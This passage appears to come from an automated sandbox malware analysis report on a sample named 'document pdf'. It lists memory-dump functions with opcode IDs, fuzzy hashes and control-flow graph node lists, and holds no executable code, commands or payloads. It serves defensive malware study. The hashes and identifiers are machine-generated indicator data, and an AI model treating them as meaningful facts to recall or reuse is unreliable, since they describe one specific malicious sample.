                                                                                                                        • Opcode Fuzzy Hash: 0e15c3a35ca09e6e2d3c1644e1fb317e3547287d973deb176113c4702621276e
                                                                                                                        • Instruction Fuzzy Hash: 81A1F474D002088FEB14DFA9C994BDDBBB5FF89304F209269E408A73A1DB759985CF54
                                                                                                                        Function 0669310E Relevance: .2, Instructions: 202COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.4671149910.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_6690000_document pdf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: e2c2c7261f3f3491b5f89d5d5dea95161b2329723c4ad6c48d3e56f08fe9f689
                                                                                                                        • Instruction ID: 3eee2d8efc3f452b7ea61972d1bf6091d0281d5fd2767fc3e8439ef51f53f723
                                                                                                                        • Opcode Fuzzy Hash: e2c2c7261f3f3491b5f89d5d5dea95161b2329723c4ad6c48d3e56f08fe9f689
                                                                                                                        • Instruction Fuzzy Hash: 0D91E174D00218CFEB50DFA8C988B9DBBB5EF49310F20925AE409B73A1DB759985CF64
                                                                                                                        Function 00F1C468 Relevance: .2, Instructions: 200COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.4664433548.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_f10000_document pdf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 87f47a04ff775fe0711d3c459308b98ba650bc2d0ebd08104badccaae3493796
                                                                                                                        • Instruction ID: 08b6f6f034a70857c2a655be5a6640086b1cb99d10a9aa489d4d1ac5e8f23604
                                                                                                                        • Opcode Fuzzy Hash: 87f47a04ff775fe0711d3c459308b98ba650bc2d0ebd08104badccaae3493796
                                                                                                                        • Instruction Fuzzy Hash: 0791D374E00258CFDB14DFAAD884BDDBBF2BF88310F14916AD409AB265DB709985DF50
                                                                                                                        Function 00F15362 Relevance: .2, Instructions: 197COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.4664433548.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_f10000_document pdf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 37b62db07baae362f501d6ee2624888104c17d1ac4034ae2a788cad9706f4505
                                                                                                                        • Instruction ID: c1cc53d253cbef91b34bde1af14e5f3cb3d9f86962c92e61d2fc601de7f76cc3
                                                                                                                        • Opcode Fuzzy Hash: 37b62db07baae362f501d6ee2624888104c17d1ac4034ae2a788cad9706f4505
                                                                                                                        • Instruction Fuzzy Hash: 6891D374E00258CFDB14DFAAD894A9DBBF2FF89310F14906AE409AB265DB309985DF50
                                                                                                                        Function 00F1D278 Relevance: .2, Instructions: 186COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.4664433548.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_f10000_document pdf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 5d6deef9a70ba232715b414ed4fb263f441d45d8e2d9a4a9fd6a5517d6bb7367
                                                                                                                        • Instruction ID: 1fe5ff86e916b5e080d2ec2f5523a16064fbfcb4426f14546d3fdf7e183d88e0
                                                                                                                        • Opcode Fuzzy Hash: 5d6deef9a70ba232715b414ed4fb263f441d45d8e2d9a4a9fd6a5517d6bb7367
                                                                                                                        • Instruction Fuzzy Hash: 2281B274E00258CFDB18DFAAD894B9DBBF2BF88310F148069E419AB365DB709985DF50
                                                                                                                        Function 00F1CCD8 Relevance: .2, Instructions: 186COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.4664433548.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_f10000_document pdf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 893442e2ade269e76014166f9517b883e09c8f4572ca53bfa6458f39e4298ed5
                                                                                                                        • Instruction ID: 08cdbbfca371941b585d900cc8a343ced64b4993d3716b51a05df255a9fb14e2
                                                                                                                        • Opcode Fuzzy Hash: 893442e2ade269e76014166f9517b883e09c8f4572ca53bfa6458f39e4298ed5
                                                                                                                        • Instruction Fuzzy Hash: 1A81C274E40258CFDB14DFAAD884B9DBBF2BF89310F148069E419AB365DB309986DF50
                                                                                                                        Function 00F1CA08 Relevance: .2, Instructions: 185COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.4664433548.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_f10000_document pdf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: c1bd40aa06c9addd610f7bc935504d5ec6e272979272fb48dca8963fe6d8e458
                                                                                                                        • Instruction ID: 757c4ba970c8f3bd8840c9eb8c094886a05753676e21cacc40e9c1514217f272
                                                                                                                        • Opcode Fuzzy Hash: c1bd40aa06c9addd610f7bc935504d5ec6e272979272fb48dca8963fe6d8e458
                                                                                                                        • Instruction Fuzzy Hash: 4681B274E00258CFDB14DFAAD894B9DBBF2BF88310F148069E419AB365DB709985DF90
                                                                                                                        Function 00F1CFAA Relevance: .2, Instructions: 185COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.4664433548.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_f10000_document pdf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 1366c46d1b4c9529c009dcca795a4e0643122a7f8bdb82e462742099c3d7984c
                                                                                                                        • Instruction ID: d7759434f8e56973ea71584cee8176864c33174a96d4d5862463b31f63f71a79
                                                                                                                        • Opcode Fuzzy Hash: 1366c46d1b4c9529c009dcca795a4e0643122a7f8bdb82e462742099c3d7984c
                                                                                                                        • Instruction Fuzzy Hash: 9F81B474E00258DFEB14DFAAD884ADDBBF2BF88310F148069E409AB365DB309985DF50
                                                                                                                        Function 00F1C738 Relevance: .2, Instructions: 180COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.4664433548.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_f10000_document pdf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 57935999f1c062348a0b70cdd522dbaca03bf7cf57b3488046857f2f60b4690f
                                                                                                                        • Instruction ID: 927b269063bae55a6b15ba5e96bec6ae61202ffc6c744da3ccefb659ed6f3733
                                                                                                                        • Opcode Fuzzy Hash: 57935999f1c062348a0b70cdd522dbaca03bf7cf57b3488046857f2f60b4690f
                                                                                                                        • Instruction Fuzzy Hash: A981B374E00218CFDB14DFAAD984B9DBBF2BF88310F14906AD419AB365DB709981DF50
                                                                                                                        Function 00F1E988 Relevance: .1, Instructions: 147COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.4664433548.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_f10000_document pdf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 9bf4fb502750c90b261b6fa581001fdbe5c5df29d8fb584c5fccfef6798f5885
                                                                                                                        • Instruction ID: 62a304d54b705dca78030ff34d671606c1f47cafa4b9cd22bbc4f495600edf30
                                                                                                                        • Opcode Fuzzy Hash: 9bf4fb502750c90b261b6fa581001fdbe5c5df29d8fb584c5fccfef6798f5885
                                                                                                                        • Instruction Fuzzy Hash: E0519574E01208DFEB18DFBAD894A9DBBB2FF88300F249029E815AB365DB745941CF54
                                                                                                                        Function 00F1E97A Relevance: .1, Instructions: 147COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.4664433548.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_f10000_document pdf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: dc78006bd71453bd0f6d2d07261389a5b0178c1c5bf1f67ed630ebd400eb93c2
                                                                                                                        • Instruction ID: ccde81f48ab8760f8e62af10e2fff7a0e95806567f427d7718f3f05ffc2817bb
                                                                                                                        • Opcode Fuzzy Hash: dc78006bd71453bd0f6d2d07261389a5b0178c1c5bf1f67ed630ebd400eb93c2
                                                                                                                        • Instruction Fuzzy Hash: 4C51A774E01208DFDB18DFBAD894A9DBBB2FF88300F249129E815AB365DB345842CF14
                                                                                                                        Function 0669992C Relevance: 1.6, APIs: 1, Instructions: 62libraryCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 1051 669992c 1052 66999eb-66999fc 1051->1052 1053 66999fe 1052->1053 1054 6699a03-6699a0c 1052->1054 1053->1054 1056 66997e3-6699808 1054->1056 1057 6699a12-6699a25 1054->1057 1058 669980a 1056->1058 1059 669980f-6699846 1056->1059 1060 6699a2c-6699a47 1057->1060 1061 6699a27 1057->1061 1058->1059 1070 6699848 1059->1070 1071 669984d-669987f 1059->1071 1062 6699a49 1060->1062 1063 6699a4e-6699a62 1060->1063 1061->1060 1062->1063 1067 6699a69-6699a7f LdrInitializeThunk 1063->1067 1068 6699a64 1063->1068 1069 6699a81-6699b7e 1067->1069 1068->1067 1073 6699b80-6699b85 1069->1073 1074 6699b86-6699b90 1069->1074 1070->1071 1076 6699881-66998a6 1071->1076 1077 66998e3-66998f6 1071->1077 1073->1074 1078 66998a8 1076->1078 1079 66998ad-66998db 1076->1079 1081 66998f8 1077->1081 1082 66998fd-6699922 1077->1082 1078->1079 1079->1077 1081->1082 1085 6699931-6699969 1082->1085 1086 6699924-6699925 1082->1086 1087 669996b 1085->1087 1088 6699970-66999d1 call 6699328 1085->1088 1086->1057 1087->1088 1094 66999d8-66999ea 1088->1094 1095 66999d3 1088->1095 1094->1052 1095->1094
                                                                                                                        APIs
                                                                                                                        • LdrInitializeThunk.NTDLL(00000000), ref: 06699A6E
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.4671149910.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_6690000_document pdf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        • Opcode ID: 9a67b57575604044288b7d78db493fb99f326b83c7484d6d4598d758738c3f3c
                                                                                                                        • Instruction ID: 00a732f2fb093f17f408c4aa49516bf8ed8242c7adeb179de3a93e9d650f5beb
                                                                                                                        • Opcode Fuzzy Hash: 9a67b57575604044288b7d78db493fb99f326b83c7484d6d4598d758738c3f3c
                                                                                                                        • Instruction Fuzzy Hash: F7117F74E002198FEF44CFE9D884BADB7B9FF88314F188259E804A7255DB71D942CB60
                                                                                                                        Function 00F12790 Relevance: 1.3, Strings: 1, Instructions: 88COMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 1758 f12790-f12794 1759 f12795-f12798 1758->1759 1759->1759 1760 f1279a-f1279c 1759->1760 1761 f127f3-f1281b 1760->1761 1762 f1279e-f127ae 1760->1762 1765 f12822-f1282d 1761->1765 1766 f1281d 1761->1766 1763 f127b0 1762->1763 1764 f127b5-f127ec 1762->1764 1763->1764 1780 f12830 call f128b0 1765->1780 1781 f12830 call f128a2 1765->1781 1766->1765 1768 f12836-f12840 1778 f12845 call f128f0 1768->1778 1779 f12845 call f128e0 1768->1779 1770 f1284b-f1289e 1778->1770 1779->1770 1780->1768 1781->1768
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.4664433548.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_f10000_document pdf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: F
                                                                                                                        • API String ID: 0-2701363647
                                                                                                                        • Opcode ID: 2b53f128be24d1fe4cea729c38d13cabfeee38c480e2b6e6dfb28d599acb90a0
                                                                                                                        • Instruction ID: d218eb769f2901e053305d0c684bb57fd2f510c3b78a24f90fb6abd6826cdfea
                                                                                                                        • Opcode Fuzzy Hash: 2b53f128be24d1fe4cea729c38d13cabfeee38c480e2b6e6dfb28d599acb90a0
                                                                                                                        • Instruction Fuzzy Hash: F8315674D0924A8FCB05EFB8D9546EEBFF0EF4A310F1002AAC445B7265EB350A85DB91
                                                                                                                        Function 00F1E018 Relevance: .6, Instructions: 647COMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 2213 f1e018-f1e022 2214 f1e024 2213->2214 2215 f1e029-f1e0a7 call f1e8e8 call f1f71f 2213->2215 2214->2215 2539 f1e0a8 call 6690c01 2215->2539 2540 f1e0a8 call 6690b20 2215->2540 2541 f1e0a8 call 6690b30 2215->2541 2234 f1e0ae 2542 f1e0af call 669178f 2234->2542 2543 f1e0af call 66917a0 2234->2543 2235 f1e0b5 2544 f1e0b6 call 6691e70 2235->2544 2545 f1e0b6 call 6691e80 2235->2545 2236 f1e0bc-f1e618 call 6692968 2535 f1e619 call 669fc68 2236->2535 2536 f1e619 call 669fc5f 2236->2536 2433 f1e61f-f1e8db 2534 f1e8e2-f1e8e5 2433->2534 2535->2433 2536->2433 2539->2234 2540->2234 2541->2234 2542->2235 2543->2235 2544->2236 2545->2236
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.4664433548.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_f10000_document pdf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 728186e1df2fd527b1c5a8a94891aa7dd6e3695997e7c28dc0db15847c726013
                                                                                                                        • Instruction ID: 56bbfe41e3189f79495fe2faf44b54ae35f76507c27d606e3d96db37e63d9b50
                                                                                                                        • Opcode Fuzzy Hash: 728186e1df2fd527b1c5a8a94891aa7dd6e3695997e7c28dc0db15847c726013
                                                                                                                        • Instruction Fuzzy Hash: 6412ABBD0216439FA2607B39E7EC52ABB60FB4F3637046C54F58F80459DB7E14898B61
                                                                                                                        Function 00F10CA0 Relevance: .5, Instructions: 539COMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 2547 f10ca0-f10cc0 2548 f10cc2 2547->2548 2549 f10cc7-f1105f call f10780 * 14 2547->2549 2548->2549 2737 f11062 call f127f0 2549->2737 2738 f11062 call f12790 2549->2738 2628 f11068-f1108f call f13cc0 2742 f11092 call f141a0 2628->2742 2743 f11092 call f14285 2628->2743 2744 f11092 call f13e09 2628->2744 2631 f11098-f1153a call f15362 call f1c146 call f1c468 call f1c738 call f1ca08 call f1ccd8 call f1cfaa call f1d278 call f15362 call f1d548 * 5 2739 f11540 call f1d6d4 2631->2739 2740 f11540 call f1d548 2631->2740 2693 f11546-f116eb call f1d548 * 10 2714 f116f1-f117aa 2693->2714 2737->2628 2738->2628 2739->2693 2740->2693 2742->2631 2743->2631 2744->2631
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.4664433548.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_f10000_document pdf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: d17d02d0a0dbcb2c1fc6576127405b76b7a6ab7e62d859bd6fb74f833760b903
                                                                                                                        • Instruction ID: 7e07503b66491f67033c5bacd47c410befa681144cca52259d3865d106ad7588
                                                                                                                        • Opcode Fuzzy Hash: d17d02d0a0dbcb2c1fc6576127405b76b7a6ab7e62d859bd6fb74f833760b903
                                                                                                                        • Instruction Fuzzy Hash: D652A978900219CFCB64EF64EDD4A9EBBB2FB88301F1045A9D509A7358DB746D86DF80
                                                                                                                        Function 00F176F1 Relevance: .5, Instructions: 477COMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 3011 f176f1-f17725 3012 f17b54-f17b58 3011->3012 3013 f1772b-f1774e 3011->3013 3014 f17b71-f17b7f 3012->3014 3015 f17b5a-f17b6e 3012->3015 3022 f17754-f17761 3013->3022 3023 f177fc-f17800 3013->3023 3019 f17b81-f17b96 3014->3019 3020 f17bf0-f17c05 3014->3020 3029 f17b98-f17b9b 3019->3029 3030 f17b9d-f17baa 3019->3030 3031 f17c07-f17c0a 3020->3031 3032 f17c0c-f17c19 3020->3032 3035 f17770 3022->3035 3036 f17763-f1776e 3022->3036 3026 f17802-f17810 3023->3026 3027 f17848-f17851 3023->3027 3026->3027 3047 f17812-f1782d 3026->3047 3033 f17c67 3027->3033 3034 f17857-f17861 3027->3034 3037 f17bac-f17bed 3029->3037 3030->3037 3038 f17c1b-f17c56 3031->3038 3032->3038 3041 f17c6c-f17c9c 3033->3041 3034->3012 3039 f17867-f17870 3034->3039 3042 f17772-f17774 3035->3042 3036->3042 3087 f17c5d-f17c64 3038->3087 3045 f17872-f17877 3039->3045 3046 f1787f-f1788b 3039->3046 3074 f17cb5-f17cbc 3041->3074 3075 f17c9e-f17cb4 3041->3075 3042->3023 3049 f1777a-f177dc 3042->3049 3045->3046 3046->3041 3052 f17891-f17897 3046->3052 3066 f1783b 3047->3066 3067 f1782f-f17839 3047->3067 3098 f177e2-f177f9 3049->3098 3099 f177de 3049->3099 3054 f1789d-f178ad 3052->3054 3055 f17b3e-f17b42 3052->3055 3064 f178c1-f178c3 3054->3064 3065 f178af-f178bf 3054->3065 3055->3033 3059 f17b48-f17b4e 3055->3059 3059->3012 3059->3039 3072 f178c6-f178cc 3064->3072 3065->3072 3073 f1783d-f1783f 3066->3073 3067->3073 3072->3055 3080 f178d2-f178e1 3072->3080 3073->3027 3081 f17841 3073->3081 3083 f178e7 3080->3083 3084 f1798f-f179ba call f17538 * 2 3080->3084 3081->3027 3089 f178ea-f178fb 3083->3089 3102 f179c0-f179c4 3084->3102 3103 f17aa4-f17abe 3084->3103 3089->3041 3091 f17901-f17913 3089->3091 3091->3041 3094 f17919-f17931 3091->3094 3156 f17933 call f17f31 3094->3156 3157 f17933 call f17ef0 3094->3157 3158 f17933 call f18055 3094->3158 3159 f17933 call f17f35 3094->3159 3160 f17933 call f17fe4 3094->3160 3161 f17933 call f17fa4 3094->3161 3162 f17933 call f17f64 3094->3162 3163 f17933 call f17f39 3094->3163 3164 f17933 call f180d8 3094->3164 3165 f17933 call f17f3d 3094->3165 3097 f17939-f17949 3097->3055 3101 f1794f-f17952 3097->3101 3098->3023 3099->3098 3104 f17954-f1795a 3101->3104 3105 f1795c-f1795f 3101->3105 3102->3055 3108 f179ca-f179ce 3102->3108 3103->3012 3123 f17ac4-f17ac8 3103->3123 3104->3105 3106 f17965-f17968 3104->3106 3105->3033 3105->3106 3109 f17970-f17973 3106->3109 3110 f1796a-f1796e 3106->3110 3112 f179d0-f179dd 3108->3112 3113 f179f6-f179fc 3108->3113 3109->3033 3114 f17979-f1797d 3109->3114 3110->3109 3110->3114 3126 f179ec 3112->3126 3127 f179df-f179ea 3112->3127 3115 f17a37-f17a3d 3113->3115 3116 f179fe-f17a02 3113->3116 3114->3033 3121 f17983-f17989 3114->3121 3117 f17a49-f17a4f 3115->3117 3118 f17a3f-f17a43 3115->3118 3116->3115 3122 f17a04-f17a0d 3116->3122 3124 f17a51-f17a55 3117->3124 3125 f17a5b-f17a5d 3117->3125 3118->3087 3118->3117 3121->3084 3121->3089 3128 f17a1c-f17a32 3122->3128 3129 f17a0f-f17a14 3122->3129 3130 f17b04-f17b08 3123->3130 3131 f17aca-f17ad4 call f163e0 3123->3131 3124->3055 3124->3125 3132 f17a92-f17a94 3125->3132 3133 f17a5f-f17a68 3125->3133 3134 f179ee-f179f0 3126->3134 3127->3134 3128->3055 3129->3128 3130->3087 3135 f17b0e-f17b12 3130->3135 3131->3130 3144 f17ad6-f17aeb 3131->3144 3132->3055 3140 f17a9a-f17aa1 3132->3140 3138 f17a77-f17a8d 3133->3138 3139 f17a6a-f17a6f 3133->3139 3134->3055 3134->3113 3135->3087 3142 f17b18-f17b25 3135->3142 3138->3055 3139->3138 3147 f17b34 3142->3147 3148 f17b27-f17b32 3142->3148 3144->3130 3153 f17aed-f17b02 3144->3153 3150 f17b36-f17b38 3147->3150 3148->3150 3150->3055 3150->3087 3153->3012 3153->3130 3156->3097 3157->3097 3158->3097 3159->3097 3160->3097 3161->3097 3162->3097 3163->3097 3164->3097 3165->3097
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.4664433548.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_f10000_document pdf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: f684f3aa9b0c663f068b24a237c630f265712edbe92d82aecc77b37dd7585d94
                                                                                                                        • Instruction ID: a98b0a5ecfdf9233bdd82be86f3d0a932b92c11b071bda500fb02e1d30a5b551
                                                                                                                        • Opcode Fuzzy Hash: f684f3aa9b0c663f068b24a237c630f265712edbe92d82aecc77b37dd7585d94
                                                                                                                        • Instruction Fuzzy Hash: B7124A30A04249DFCB15EF68C984ADEBBF1FF88324F148599E4499B261DB34ED81DB90
                                                                                                                        Function 00F15F38 Relevance: .3, Instructions: 266COMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 3584 f15f38-f15f5a 3585 f15f70-f15f7b 3584->3585 3586 f15f5c-f15f60 3584->3586 3587 f15f81-f15f83 3585->3587 3588 f16023-f1604f 3585->3588 3589 f15f62-f15f6e 3586->3589 3590 f15f88-f15f8f 3586->3590 3591 f1601b-f16020 3587->3591 3596 f16056-f160ae 3588->3596 3589->3585 3589->3590 3592 f15f91-f15f98 3590->3592 3593 f15faf-f15fb8 3590->3593 3592->3593 3594 f15f9a-f15fa5 3592->3594 3667 f15fba call f15f38 3593->3667 3668 f15fba call f15f2a 3593->3668 3594->3596 3597 f15fab-f15fad 3594->3597 3616 f160b0-f160b6 3596->3616 3617 f160bd-f160cf 3596->3617 3597->3591 3598 f15fc0-f15fc2 3599 f15fc4-f15fc8 3598->3599 3600 f15fca-f15fd2 3598->3600 3599->3600 3603 f15fe5-f16004 call f169a0 3599->3603 3604 f15fe1-f15fe3 3600->3604 3605 f15fd4-f15fd9 3600->3605 3609 f16006-f1600f 3603->3609 3610 f16019 3603->3610 3604->3591 3605->3604 3663 f16011 call f1aef0 3609->3663 3664 f16011 call f1afad 3609->3664 3610->3591 3613 f16017 3613->3591 3616->3617 3619 f16163-f16165 3617->3619 3620 f160d5-f160d9 3617->3620 3665 f16167 call f162f0 3619->3665 3666 f16167 call f16300 3619->3666 3621 f160e9-f160f6 3620->3621 3622 f160db-f160e7 3620->3622 3628 f160f8-f16102 3621->3628 3622->3628 3623 f1616d-f16173 3626 f16175-f1617b 3623->3626 3627 f1617f-f16186 3623->3627 3629 f161e1-f16240 3626->3629 3630 f1617d 3626->3630 3633 f16104-f16113 3628->3633 3634 f1612f-f16133 3628->3634 3642 f16247-f1625e 3629->3642 3630->3627 3645 f16123-f1612d 3633->3645 3646 f16115-f1611c 3633->3646 3635 f16135-f1613b 3634->3635 3636 f1613f-f16143 3634->3636 3638 f16189-f161da 3635->3638 3639 f1613d 3635->3639 3636->3627 3640 f16145-f16149 3636->3640 3638->3629 3639->3627 3640->3642 3643 f1614f-f16161 3640->3643 3643->3627 3645->3634 3646->3645 3663->3613 3664->3613 3665->3623 3666->3623 3667->3598 3668->3598
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.4664433548.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_f10000_document pdf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: a030c78cd4d2333c473c4f744a6760ef1a188d017d09f902823977c98cfc54eb
                                                                                                                        • Instruction ID: a50ca040ee28cc3e75fbaf88c59e1a23463d2119d18bb662d24dc7cae62ccd21
                                                                                                                        • Opcode Fuzzy Hash: a030c78cd4d2333c473c4f744a6760ef1a188d017d09f902823977c98cfc54eb
                                                                                                                        • Instruction Fuzzy Hash: 7791AC757042019FDB159F78C894BAE7BE2AFC8710F148469E446CB396DB39CC82EB91
                                                                                                                        Function 00F16498 Relevance: .2, Instructions: 231COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.4664433548.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_f10000_document pdf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 7599c3f8450b4a26771c4cf16c6ec5b7ccc44de452821f140fcc28c59375c1e2
                                                                                                                        • Instruction ID: ddb63d80a71dfe0c5fbab59f8261ea8c65be1206ea7513e53d08b2dbed10527a
                                                                                                                        • Opcode Fuzzy Hash: 7599c3f8450b4a26771c4cf16c6ec5b7ccc44de452821f140fcc28c59375c1e2
                                                                                                                        • Instruction Fuzzy Hash: 2C815E75F00515CFCB14CFA9C884AEABBB2BF89324B258169D405DB365DB31EC81DB91
                                                                                                                        Function 00F180D8 Relevance: .2, Instructions: 201COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.4664433548.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_f10000_document pdf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 00a4094d7ed77d7dd19dbc247f8de98313935bc86c4f52d25ef98d6dfef2faff
                                                                                                                        • Instruction ID: 54451df1c0ce13e5ef45d3770da733bde4721b2d6589ba50faaccff154147c3e
                                                                                                                        • Opcode Fuzzy Hash: 00a4094d7ed77d7dd19dbc247f8de98313935bc86c4f52d25ef98d6dfef2faff
                                                                                                                        • Instruction Fuzzy Hash: 71717E34B006458FCB25DF28C984AAE7BE5AF49390F1501A9E806DB371DF75DC82DB50
